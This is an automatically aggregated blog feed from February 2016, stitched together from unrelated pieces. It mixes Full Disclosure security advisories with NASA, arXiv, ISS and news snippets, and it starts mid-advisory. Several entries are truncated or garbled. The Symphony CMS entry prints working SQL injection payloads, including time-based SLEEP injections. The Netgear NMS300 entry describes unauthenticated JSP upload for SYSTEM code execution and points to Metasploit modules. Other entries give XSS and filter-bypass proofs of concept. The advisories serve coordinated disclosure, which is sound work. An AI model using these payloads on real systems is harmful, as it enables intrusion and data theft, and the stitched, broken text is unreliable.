======================= The loop issue needs to be patched in the main interface by the dev team. The issue can be prevented by a locate of the stack with a restriction. Security Risk: ============== The security risk of the local iOS loop that results in a pass code bypass vulnerability is estimated as high. (CVSS 6.0) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [http://ift.tt/1jnqRwA] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

Reps. Maloney, King and Senator Whitehouse introduce bills to stop anonymous money ...

Maloney, King and Senator Whitehouse introduce bills to stop anonymous money laundering operations by requiring disclosure of shell corporation ...

from Google Alert - anonymous http://ift.tt/1PC09EH
via IFTTT

Galaxy Wars: M81 versus M82

In the lower left corner, surrounded by blue spiral arms, is spiral galaxy M81. In the upper right corner, marked by red gas and dust clouds, is irregular galaxy M82. This stunning vista shows these two mammoth galaxies locked in gravitational combat, as they have been for the past billion years. The gravity from each galaxy dramatically affects the other during each hundred million-year pass. Last go-round, M82's gravity likely raised density waves rippling around M81, resulting in the richness of M81's spiral arms. But M81 left M82 with violent star forming regions and colliding gas clouds so energetic the galaxy glows in X-rays. This big battle is seen from Earth through the faint glow of an Integrated Flux Nebula, a little studied complex of diffuse gas and dust clouds in our Milky Way Galaxy. In a few billion years only one galaxy will remain. via NASA http://ift.tt/1TDhw9I

Wednesday, February 3, 2016

[FD] ArpON (ARP handler inspection) 3.0-ng release

Hello guys, we have released the next generation 3.0 version. ArpON is a Host-based solution that make the ARP standardized protocol secure in order to avoid the Man In The Middle (MITM) attack through the ARP spoofing, ARP cache poisoning or ARP poison routing attack. For further information please visit: http://ift.tt/1sHpT5N Thank you in advance.

Source: Gmail -> IFTTT-> Blogger

[FD] A tale of openssl_seal(), PHP and Apache2handle

[FD] Apple Software Update 2.1.3 (Windows) Remote Command Execution.

[FD] CALL FOR PAPERS - FAQin Congress - Madrid

The FAQin Association is proud to announce the call for [ papers, presentations, proposals ] at FAQin congress -=] About FAQin Congress FAQin congress is a free invitation-only underground hacking event in Madrid, Spain at We Rock venue from 5th to 6th of March. No press, no cops... Just you, your peers and a bunch of free beer. Think about it. Attendance is free, attendees must pass a CTF-like challenge to get a ticket. Full details at www.faqin.org -=] We are looking for offensive focused content: - Reverse engineering [ Hardware, Software, Protocol... ] - Writing and using exploits - Bypassing protections - Attacks on cryptography - Or any kind of offensive hacking -=] Guidelines: - 45 minute slots, if you need double slot let us know. - We are open to proposals for workshops, demos, live hacks... Please send an abstract, bio and "mugshot" to cfp@faqin.org before 15th of February. Questions? Free tickets? info@faqin.org

Source: Gmail -> IFTTT-> Blogger

[FD] [CERT 777024 / CVE-2016-1524/5]: RCE and file download in Netgear NMS300

Hi, CERT/CC has helped me disclose two vulnerabilities in NETGEAR's Pro"safe" Network Management System 300 [1]. Two classical bugs: one remote code execution via arbitrary file upload and an authenticated arbitrary file download. The full advisory can be seen in my repo at [2] and it is also pasted below. I've also released two Metasploit modules to exploit these vulnerabilities [3][4]. There is currently no fix for these - do not expose NMS300 to the Internet! I've decided to release the exploits anyway as CERT's advisory details how the vulnerability can be exploited. Regards, Pedro [1] http://ift.tt/23JYAKN [2] http://ift.tt/1P86iH8 [3] http://ift.tt/1nOa8fH [4] http://ift.tt/1NQVQQh >> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300 >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://ift.tt/1JewOIU) ========================================================================== Disclosure: 04/02/2016 / Last updated: 04/02/2016 >> Background on the affected product: "NMS300 ProSAFE® Network Management System Diagnose, control, and optimize your network devices. The NETGEAR Management System NMS300 delivers insight into network elements, including third-party devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network." >> Summary: Netgear's NMS300 is a network management utility that runs on Windows systems. It has serious two vulnerabilities that can be exploited by a remote attacker. The first one is an arbitrary file upload vulnerability that allows an unauthenticated attacker to execute Java code as the SYSTEM user. The second vulnerability is an arbitrary file download that allows an authenticated user to download any file from the host that is running NMS300. A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released. >> Technical details: #1 Vulnerability: Remote code execution via arbitrary file upload (unauthenticated) CVE-2016-1525 Affected versions: NMS300 1.5.0.11 NMS300 1.5.0.2 NMS300 1.4.0.17 NMS300 1.1.0.13 There are two servlets that allow unauthenticated file uploads: @RequestMapping({ "/fileUpload.do" }) public class FileUpload2Controller - Uses spring file upload @RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" }) public class FileUploadController - Uses flash upload The JSP file can be uploaded as shown below, it will be named null[name].[extension] and can be reached on http://[host]:8080/null[name].[extension]. So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user. POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1 Content-Type: multipart/form-data; boundary

Source: Gmail -> IFTTT-> Blogger

[FD] Dell SecureWorks iOS Application - MITM SSL Certificate Vulnerability

Dell SecureWorks iOS Application - MITM SSL Certificate Vulnerability

Source: Gmail -> IFTTT-> Blogger

[FD] Sauter ModuWEB Vision SCADA vulnerabilities

Vulnerabilities

Source: Gmail -> IFTTT-> Blogger

[FD] DLink DVGN5402SP Multiple Vulnerabilities

[FD] ASUS RT-N56U Persistent XSS

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] MailPoet Newsletter 2.6.19 - Security Advisory - Reflected XSS

Information

Source: Gmail -> IFTTT-> Blogger

[FD] GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text Sensitive Info Vulnerabilities

[FD] Time-based SQL Injection in Admin panel UliCMS <= v9.8.1

============================================= MGC ALERT 2016-001 - Original release date: January 26, 2016 - Last revised: February 02, 2016 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 (CVSS Base Score) ============================================= I. VULNERABILITY

Source: Gmail -> IFTTT-> Blogger

[FD] Opendocman 1.3.4: HTML Injection

[FD] Opendocman 1.3.4: CSRF

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Opendocman 1.3.4 Fixed in: 1.3.5 Fixed Version Link: http://ift.tt/1okiDue Vendor Website: http://ift.tt/Uef2S6 Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 02/01/2016 Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description Opendocman does not have CSRF protection, which means that an attacker can perform actions for an admin, if the admin visits an attacker controlled website while logged in. 3. Proof of Concept Add new Admin User: 4. Solution To mitigate this issue please upgrade at least to version 1.3.5: http://ift.tt/1okiDue Please note that a newer version might already be available. 5. Report Timeline 11/21/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of disclosure date 12/19/2015 Vendor sends fix for CSRF for verification 01/13/2016 Confirmed CSRF fix 01/20/2016 Vendor requests more time to fix other issues in same version 01/31/2016 Vendor releases fix 02/01/2015 Disclosed to public Blog Reference: http://ift.tt/1P86kyB

Source: Gmail -> IFTTT-> Blogger

[FD] Atutor 2.2: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Atutor 2.2 Fixed in: partly in ATutor 2.2.1-RC1, complete in 2.2.1 Fixed Version Link: http://ift.tt/PfH9i9 Vendor Website: http://www.atutor.ca/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 02/01/2016 Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Atutor is a learning management system (LMS) written in PHP. In version 2.2, it is vulnerable to multiple reflected and persistent XSS attacks. The vulnerabilities can lead to the stealing of cookies, injection of keyloggers, or the bypassing of CSRF protection. If the victim is an admin, a successful exploitation can lead to code execution via the theme uploader, and if the victim is an instructor, this can lead to code execution via a file upload vulnerability in the same version of Atutor. 3. Details XSS 1: Reflected XSS - Calendar CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: The calendar_next parameter of the calendar is vulnerable to XSS. This issue has been fixed in ATutor 2.2.1-RC1. Proof of Concept: http://localhost/ATutor/mods/_standard/calendar/getlanguage.php?token=calendar_next

[FD] Equibase.com HTML Injection/Possible Reflected XSS

Vulnerability Type: HTML Injection (Possible XSS) Title: Equibase.com HTML Injection Site Description: Equibase.com is the official source for horse racing results, mobile racing data, statistics as well as all other horse racing and thoroughbred racing information. Details: The page http://ift.tt/20apF5n has a parameter called type (e.g. http://ift.tt/1o81EAa) that has a limited set of valid values. The input for this parameter is render unmodified in the output. This allows for reflected HTML injection and content spoofing such as: http://ift.tt/20apDug Various other HTML tags were accepted and rendered. Some limited filtering did appear to be in place for XSS mitigation, as basic XSS attacks did not work. Since this was not a sanctioned test by the site owner, extensive reflected XSS testing in this parameter was not tested but based on observation the filtering in place did not appear to be sufficient to stop an advanced reflected XSS attack. Vulnerability Severity: Medium Vendor Interaction: Vendor notified on 1/17 with full report. No response received.

Source: Gmail -> IFTTT-> Blogger

[FD] OpenXchange | Information Disclosure

[FD] VMWare Zimbra Mailer | DKIM longterm Mail Replay vulnerability

Hi@all, VMWare Zimbra Mailer Release 8.6.0.GA, latest patch and prior versions with DKIM implementation are vulnerable to longterm Mail Replay attacks. If the expiration header is not set, the signature never expires. This means, that the e-mail, perhaps catched while performing a man in the middle attack, can be replayed years after catching it. This can be combined with the spoofed reply-to header field, because the header field is not hashed by Zimbras DKIM implementation. Supporter of vulnerability analysis: Steffen Mauer @this point I want to thank Steffen for his good work =) Background: To configure DKIM with VMware Zimbra the official documentation advises the administrator to use the zimbra management tools. With the management tools there is no possibility to add custom Header’s for hashing it with DKIM or for setting the expiration DKIM Header. (http://ift.tt/1VB2KPe)

Source: Gmail -> IFTTT-> Blogger

[FD] Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities

================================================================ Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities ================================================================ Information ================================================================ Vulnerability Type : Multiple SQL Injection Vulnerabilities Vendor Homepage: http://ift.tt/1bgFZfB Vulnerable Version:Symphony CMS 2.6.3 Fixed Version :Symphony CMS 2.6.5 Severity: High Author – Sachin Wagh (@tiger_tigerboy) Description ================================================================ The vulnerability is located in the 'fields[username]','action[save]' and 'fields[email]' of the '/symphony/system/authors/new/' page. Proof of Concept ================================================================ *1. fields[username] (POST)* Parameter: fields[username] (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-6697' OR 7462=7462#&fields[user_type]=author&fields[password]=sach in&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create Author Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-8105' OR 1 GROUP BY CONCAT(0x71767a7871,(SELECT (CASE WHEN (1004=1 004) THEN 1 ELSE 0 END)),0x716b7a6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_a rea]=3&action[save]=Create Author Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (comment) Payload: xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=sachin123' OR SLEEP(5)#&fields[user_type]=author&fields[password]=s achin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create Author

Source: Gmail -> IFTTT-> Blogger

[FD] ManageEngine Eventlog Analyzer v4-v10 Privilege Esacalation

[FD] AST-2016-003: Remote crash vulnerability when receiving UDPTL FAX data.

[FD] AST-2016-002: File descriptor exhaustion in chan_sip

[FD] AST-2016-001: BEAST vulnerability in HTTP server

Spatial Concept Acquisition for a Mobile Robot that Integrates Self-Localization and Unsupervised Word Discovery from Spoken Sentences. (arXiv:1602.01208v1 [cs.AI])

In this paper, we propose a novel unsupervised learning method for the lexical acquisition of words related to places visited by robots, from human continuous speech signals. We address the problem of learning novel words by a robot that has no prior knowledge of these words except for a primitive acoustic model. Further, we propose a method that allows a robot to effectively use the learned words and their meanings for self-localization tasks. The proposed method is nonparametric Bayesian spatial concept acquisition method (SpCoA) that integrates the generative model for self-localization and the unsupervised word segmentation in uttered sentences via latent variables related to the spatial concept. We implemented the proposed method SpCoA on SIGVerse, which is a simulation environment, and TurtleBot2, which is a mobile robot in a real environment. Further, we conducted experiments for evaluating the performance of SpCoA. The experimental results showed that SpCoA enabled the robot to acquire the names of places from speech sentences. They also revealed that the robot could effectively utilize the acquired spatial concepts and reduce the uncertainty in self-localization.

Donate to arXiv

from cs.AI updates on arXiv.org http://ift.tt/1NR5z9c
via IFTTT

Finding the different patterns in buildings data using bag of words representation with clustering. (arXiv:1602.01398v1 [cs.AI])

The understanding of the buildings operation has become a challenging task due to the large amount of data recorded in energy efficient buildings. Still, today the experts use visual tools for analyzing the data. In order to make the task realistic, a method has been proposed in this paper to automatically detect the different patterns in buildings. The K Means clustering is used to automatically identify the ON (operational) cycles of the chiller. In the next step the ON cycles are transformed to symbolic representation by using Symbolic Aggregate Approximation (SAX) method. Then the SAX symbols are converted to bag of words representation for hierarchical clustering. Moreover, the proposed technique is applied to real life data of adsorption chiller. Additionally, the results from the proposed method and dynamic time warping (DTW) approach are also discussed and compared.

Donate to arXiv

from cs.AI updates on arXiv.org http://ift.tt/1NR5z9a
via IFTTT

Incremental Truncated LSTD. (arXiv:1511.08495v2 [cs.LG] UPDATED)

Balancing between computational efficiency and sample efficiency is an important goal in reinforcement learning. Temporal difference (TD) learning algorithms stochastically update the value function, with a linear time complexity in the number of features, whereas least-squares temporal difference (LSTD) algorithms are sample efficient but can be quadratic in the number of features. In this work, we develop an efficient incremental low-rank LSTD({\lambda}) algorithm that progresses towards the goal of better balancing computation and sample efficiency. The algorithm reduces the computation and storage complexity to the number of features times the chosen rank parameter while summarizing past samples efficiently to nearly obtain the sample complexity of LSTD. We derive a simulation bound on the solution given by truncated low-rank approximation, illustrating a bias- variance trade-off dependent on the choice of rank. We demonstrate that the algorithm effectively balances computational complexity and sample efficiency for policy evaluation in a benchmark task and a high-dimensional energy allocation domain.

Donate to arXiv

from cs.AI updates on arXiv.org http://ift.tt/1l14BRH
via IFTTT

ISS Daily Summary Report – 02/3/16

Russian Segment (RS) Extravehicular Activity (EVA) #42: Today, Malenchenko and Volkov successfully completed RS EVA #42. Duration of the EVA was 4 hours and 45 minutes. The crew performed the following tasks: Samples from DC-1 EV Hatch 1 external surface and SM Window #8 cover drive location in support of TEST Experiment. Thumb Drive Jettison Removal of EXPOSE-R monoblock from the Service Module Removal of СКК #2-М2 cassette-container and installation of СКК #3-М2 cassette-container onto МRМ2 Installation of БЭО #2 (Sample Exposure Unit) on MRM2 in support of the VINOSLIVOST Experiment Changing orientation of БКДО (Plume Impingement and Deposit Monitoring Unit) on МRМ2 Installation of gap spanners on FGB ПГО-3 conical section Installation of RESTAVRATSIYA Experiment onto DC1 EVA ladder Photos of ISS RS exterior Photo Survey: During the EVA ingress timeframe, Kelly and Kornienko were isolated to the MRM2 / 44S volume. While in MRM2, Kelly performed a photo survey of the Starboard Solar Array Wing Mast and the Crew and Equipment Translation Aid (CETA) Toolbox. Burning and Suppression of Solids – Milliken (BASS-M): Today Kopra completed the third set of BASS-M operations, preparing and testing five different samples with ground assistance from the Principal Investigator. The BASS-M investigation tests flame-retardant cotton fabrics to determine how well they resist burning in microgravity. Results benefit research on flame-retardant textiles that can be used on Earth and in space. Combustion Integrated Rack (CIR) Maintenance and Reconfiguration: Kelly completed the second of three planned days of Multi-user Droplet Combustion Apparatus (MDCA) maintenance in the CIR. During the multi-day reconfiguration he will replace the needles, fuel reservoirs, igniter tips and the fiber arm. The CIR reconfiguration activities performed this week are to prepare it for runs of the FLEX-2 experiment next week. The CIR is used to perform combustion experiments in microgravity. FLEX-2 studies the rate and manner in which fuel is burned, the conditions that are necessary for soot to form, and the way in which a mixture of fuels evaporate before burning. The results from these experiments are expected to give scientists a better understanding of how fires behave in space and will provide information that will be useful in increasing the fuel efficiency of engines that use liquid fuels. Japanese Experiment Module (JEM) Airlock Pressurization and Leak Check: On Monday, Peake brought the JEM Airlock Slide Table with attached Cyclops back into the Airlock. Today he pressurized the JEM Airlock and performed a leak check. This Friday he will remove Cyclops from the Slide Table and stow it in the ISS. Oxygen Generation Assembly (OGA) H2 Sensor Change Out: On Monday, OGA experienced a fault associated with its H2 sensor. Today, Peake performed a change out of the OGA H2 sensor. The ground team successfully reactivated the system later in the day. Lab Carbon Dioxide Removal Assembly (CDRA) Status: Yesterday afternoon the Lab CDRA faulted due to Air Selector Valve (ASV) 104 not reaching its correct position. Flight Controllers were able to recover Lab CDRA and reactivated the system. This morning Lab CDRA faulted due to valve 105 and was recovered. This afternoon Lab CDRA faulted yet again due to valve 104. Flight controllers are working to recover. Amine Swingbed is active to help manage carbon dioxide levels. Node 3 CDRA experienced a fault with its Fan Motor Controller on January 19th and is currently deactivated, with maintenance activities scheduled to begin tomorrow. The Russian Vozdukh was deactivated for today’s EVA, and has since been reactivated. Air Quality Monitor (AQM) Deploy: Kopra deployed two new AQMs within the Lab today. Checkout of one of the AQMs was nominal, but the second showed internal sample pressure lower than design. Ground teams are working on troubleshooting steps. The new monitors arrived onboard Orbital ATK (OA)-4 and replace older units. Today’s Planned Activities All activities are on schedule unless otherwise noted. Biochemical urine test (pre-EVA) DC1 and ПхО setup for EVA USOS window shutter close CUCU hardware deactivation c/o prior to EVA -42 On MCC Go Post-deactivation БС Elektron Purge Spacesuit systems c/o MDCA – hardware relocation (part 2) JEMAL – JEM Airlock repress Pre-EVA MRM2 setup and Soyuz 718 activation Orlan interface unit (БСС) c/o in DC1 Orlan interface unit (БСС) c/o in ПхО BASSM – prep ops 1 JEMAL – JEM Airlock leak check Columbus Stowage Consolidation Part 2/3 Pre-EVA comm config and ПСС Caution and Warning switchover On MCC Go Tranzit-B activation DC1 БК-3М c/o Spacesuit, Orlan interface unit (БСС), comm and medical parameters checkout via TLM Pre-EVA ISS onboard systems configuration (stage 1) Final inspection of spacesuits and interface units prior to spacesuit donning Gear donning Dose Tracker data entry – subject OGA Hydrogen Sensor Unstow Air ducts removal in DC1 (without [В3] fan) AQM Cartridge R&R Pre-EVA depress AQM Placement and Checkout CIR – combustion chamber closure OGA Hydrogen Sensor R&R CIR – rack doors closure HMS – defibrillator inspection Periodical fitness check – nominal ops (subject) BASSM – experiment start EVA-42 CDRA recovery procedure review СОЖ Maintenance BASSM – BASS hardware install and test runs OGA Hydrogen Sensor R&R HABIT. Overview video BASSM – BASS hardware install and test runs DOSETRK – Application Update (start) iPad Configuration for Dose Tracker Dose Tracker Data Entry – Subject BASSM – Experiment Completion JRNL – journal entry On MCC Go Pre-EVA ISS onboard systems configuration (stage 2) P/TV setup for SA truss imagery MRM2 air ducts removal / r/g 1311 P/TV – starboard SA truss inspection On MCC Go РО-ПхО, МRМ2-СУ hatch closure (SM) On MCC Go ПГО-СУ hatch closure (SМ) Post-EVA repress Soyuz 718 crew isolation in МRМ2 during EVA-42 Post-EVA repress – assistance FMK deployment ops GSC container sampling ops FCC photography hardware stow On MCC Go МRМ2-СУ hatch opening (SМ) Comm deconfiguraion, C&W’s switchover from ПхО EVA support panel to C&W panel (ПСС) On MCC Go Тranzit-B deactivation ISS RS configuration to initial Post-EVA DC1 air ducts install USOS window shutter closing Biochemical urine test post EVA […]

from ISS On-Orbit Status Report http://ift.tt/1nHEpMO
via IFTTT

Mismatched anonymous define

Mismatched anonymous define () (1 post). kik7. Member Posted 24 minutes ago #. Hi everyone! Please help me solve this problem. I can't get data ...

from Google Alert - anonymous http://ift.tt/1o6MXwY
via IFTTT

Latest Windows 10 May Have a Linux Subsystem Hidden Inside

A Few Months Back, Microsoft impressed the world with 'Microsoft loves Linux' announcements, including: it has developed a custom Linux-based OS for running Azure Cloud Switch and selected Ubuntu as the operating system for their Cloud-based Big Data services.

Now a renowned Windows Hacker and computer expert, who goes by the name ‘WalkingCat’, discovered that latest version of Windows 10 may have a Linux subsystem secretly installed in it.

According to his tweets, hacker spotted two mysterious files, LXss.sys and LXCore.sys, in the most latest Windows 10 Redstone Build 14251, which are suspected to be part of Microsoft’s Project Astoria.

Project Astoria, also known as Windows Bridge for Android, is a toolkit that allows running Android apps on Windows 10 Mobile devices.

The naming convention for latest discovered files is very similar to the Android Subsystem files from Project Astoria, i.e. ADss.sys.

So, the "LX" in these name, however, can only be taken for one thing, and that is LINUX, suggests the Windows 10 OS will have access to a Linux subsystem also.

Why Linux Subsystem?

Since Windows 10 has been introduced as a Universal Operating system for all devices, so there it could be possibility that Microsoft wants to expand Project Astoria from Windows Mobile to Desktop users

If this comes to be true, adding a Linux subsystem could be beneficial if Microsoft also has ambitious planned to offer support for Linux-based applications on Windows operating system, especially servers related technology and software.

Stay tuned to The Hacker News Facebook page for further developments on this topic. Isn't exciting?

from The Hacker News http://ift.tt/20qpBDO
via IFTTT

Better fields not recorded when 'Cache pages for anonymous users'

When you enable 'Cache pages for anonymous users' the Node ID (and other better statistics data) is not passed through, not recorded, neither to ...

from Google Alert - anonymous http://ift.tt/1S0uDSK
via IFTTT

[FD] Security Advisories

[FD] Compal ConnectBox Wireless - Passphrase Settings Filter Bypass Vulnerability

Document Title: =============== Compal ConnectBox Wireless - Passphrase Settings Filter Bypass Vulnerability References (Source): ==================== http://ift.tt/1R1AN3U Release Date: ============= 2016-02-03 Vulnerability Laboratory ID (VL-ID): ==================================== 1705 Common Vulnerability Scoring System: ==================================== 5.8 Product & Service Introduction: =============================== Wireless modem CBN CH7465LG is the world`s most compact voice modem. EuroDOCSIS 3.0 in the stylish and elegant design suitable for home, home office or smaller businesses. It can be used in households with one or more computers with support. Wireless remote access to a wireless modem. (Copy of the Homepage: http://ift.tt/1X2Zqxz ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a filter bypass web vulnerability in the official Compal Wireless ConnectBox web-application. Vulnerability Disclosure Timeline: ================================== 2016-02-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Compal Product: ConnectBox - (Wireless) 4.01 - H7465LG-NCIP-4.50.18.15-1-NOSH Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A filter bypass web vulnerability has been discovered in the official Compal Wireless ConnectBox web-application. The filter bypass web vulnerability allows an attacker to evade the controls of a restriction- or protection mechanism. The issue allows an attacker to change the wireless passphrase to an insecure passphrase which is forbidden by the applications javascript engine. The vulnerability affects the `ConnectBox` manufactured by Compal for the local small ISP - Unitymedia. They are offering high-speed internet access over Cable (TV). To bypass the filter you only need to replay the POST which changes the wireless passphrase and change the parameters `wlPSkey2g` and `wlPSkey5g`. The filter won`t allow you to set a passphrase without specialchars or uppercase/lowercase letters. By bypassing the filter you can set any passphrase (wpa needs at least 8 chars). The security risk of the filter bypass vulnerability is estimated as medium and the cvss (common vulnerability scoring system) count is 5.8. Exploitation of the filter bypass vulnerability requires a privileged web-application user account with privileged access and medium user interaction. Successful exploitation of the vulnerability results in unauthorized access by setting a low secured passphrase key for wpa and wpa2. Model: CH7465LG-LC Hardware Version 4.01 Software Version CH7465LG-NCIP-4.50.18.15-1-NOSH Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers in the local networka with privileged web-application user account or privileged access and medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information or steps below to continue.

Source: Gmail -> IFTTT-> Blogger

[FD] Getdpd Bug Bounty #1 - (asm0option0) Persistent Web Vulnerability

Document Title: =============== Getdpd Bug Bounty #1 - (asm0option0) Persistent Web Vulnerability References (Source): ==================== http://ift.tt/1aXDAZq ID: #14770 Release Date: ============= 2016-02-02 Vulnerability Laboratory ID (VL-ID): ==================================== 1564 Common Vulnerability Scoring System: ==================================== 3.6 Product & Service Introduction: =============================== DPD is an all-in-one shopping cart and digital fulfillment service for downloadable products. Serving thousands of stores, DPD processes and delivers millions worth of downloads each year. (Copy of the Vendor Homepage: http://ift.tt/1PzrDdV ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research team discovered an application-side input validation web vulnerability in the official Getpdp online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-08-06: Researcher Notification & Coordination (Hadji Samir - Evolution Security GmbH) 2015-08-07: Vendor Notification (DPD Security Team - Bug Bounty Program) 2015-09-02: Vendor Response/Feedback (DPD Security Team - Bug Bounty Program) 2016-01-07: Vendor Fix/Patch (DPD Developer Team) 2016-02-02: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== DPD - Digital Product Delivery Product: DPD Online Service (Web-Application) 2015 Q3 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ An application-side cross site scripting web vulnerability has been discovered in the official Getdpd online service web-application. The security vulnerability allows remote attackers to inject own script code to the application-side of the affected application module. The vulnerability is located in the input value id asm0option0 of the Button/Link creator module. Remote attackers with low privilege web-application user accounts are able to inject own malicious script code via POST method request. The injection point is the vulnerable id parameter with the title input and the execution point is located in storefront/productchooser?method=cart module. The request method to inject is POST and the vulnerability is located to the application-side of the vulnerable service. The security risk of the application-side cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9. Exploitation of the persistent input validation web vulnerability requires a low privilege web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable Service(s): [+] getdpd.com Vulnerable Module(s): [+] Button/Link creator Vulnerable Parameter(s): [+] storefront/productchooser?method=cart (asm0option0) Proof of Concept (PoC): ======================= The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Create new product with payload code( injection code) 2. Click to creat Button/link creator (http://ift.tt/1P61r9j) 3. Click Product Chooser (http://ift.tt/1PzrEhW) 4. Product Chooser 5. The payload code will execute! PoC: Source

Product Chooser

Add products to your chooser using the pulldown on the left. Once added to the display below, sort them as you like by dragging and dropping. Click on a button to use it. Click on it again to remove it. When you don't use a button, selecting from your chooser will automatically send you to the cart (or buy now). Once you have it the way you like, copy the code and paste it on your site.

Added: ``>

``> <span class="``asmListItemLabel``">($1.00)</span><a href="``http://ift.tt/1PzrEhW``" class="``asmListItemRemove``">remove</a>

Generated Code:

Reference(s):
https://getdpd.com/
http://ift.tt/1P61r9j
http://ift.tt/1PzrEhW

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable input fields. Restrict the input and disallow usage of special chars.
Filter and setip a secure exception handling that prevent the persistent execution in the output location.

Security Risk:
==============
The security risk of application-side input validation web vulnerability in the frontend of the getdpd web-application is estimated as medium. (CVSS 3.6)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [samir@evolution-sec.com] [http://ift.tt/1jnqRwA] (http://ift.tt/1OEBM8e)

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    http://ift.tt/1jnqRwA       - www.vuln-lab.com                                      - http://ift.tt/1kouTut
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
